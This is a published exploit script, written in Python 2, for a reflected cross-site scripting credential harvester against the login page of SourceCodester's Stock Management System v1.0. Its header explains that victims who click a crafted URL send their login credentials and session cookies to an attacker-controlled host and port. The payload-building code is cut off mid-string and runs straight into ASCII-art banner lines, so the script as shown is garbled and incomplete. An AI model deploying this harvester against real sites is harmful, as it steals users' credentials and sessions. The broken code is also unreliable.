# Exploit Title: Stock Management System v1.0 - Cross-Site Scripting Credential Harvester (Login-Portal) # Exploit Author: Bobby Cooke # Date: 2020-08-01 # Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS # CWE-523: Unprotected Transport of Credentials # OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS) # CVSS Base Score: 6.4 | Impact Subscore: 4.7 | Exploitability Subscore: 1.6 # CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # Vulnerability Description: # Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters # Stock Management System v1.0 allows remote attackers to harvest login credentials & session cookie via # unauthenticated victim clicking malicious URL and entering credentials. import socket,sys,urllib,re from thread import * from colorama import Fore, Back, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' ' err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' ' ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' ' def urlEncode(javascript): return urllib.quote(javascript) def genXssPayload(LHOST,LPORT): XSS_PAYLOAD = '/" method="post" id="loginForm">
___ | | .--.\n"
SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n"
SIG += F[4]+" | "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n"
SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n"
SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
return SIG
def header():
head = S[3]+F[2]+' --- Stock Management System v1.0 | Reflected XSS Credential Harvester ---\n'+S[0]
return head
if __name__ == "__main__":
print(header())
print(sig())
if len(sys.argv) != 4:
print(err+formatHelp("(+) Usage: python %s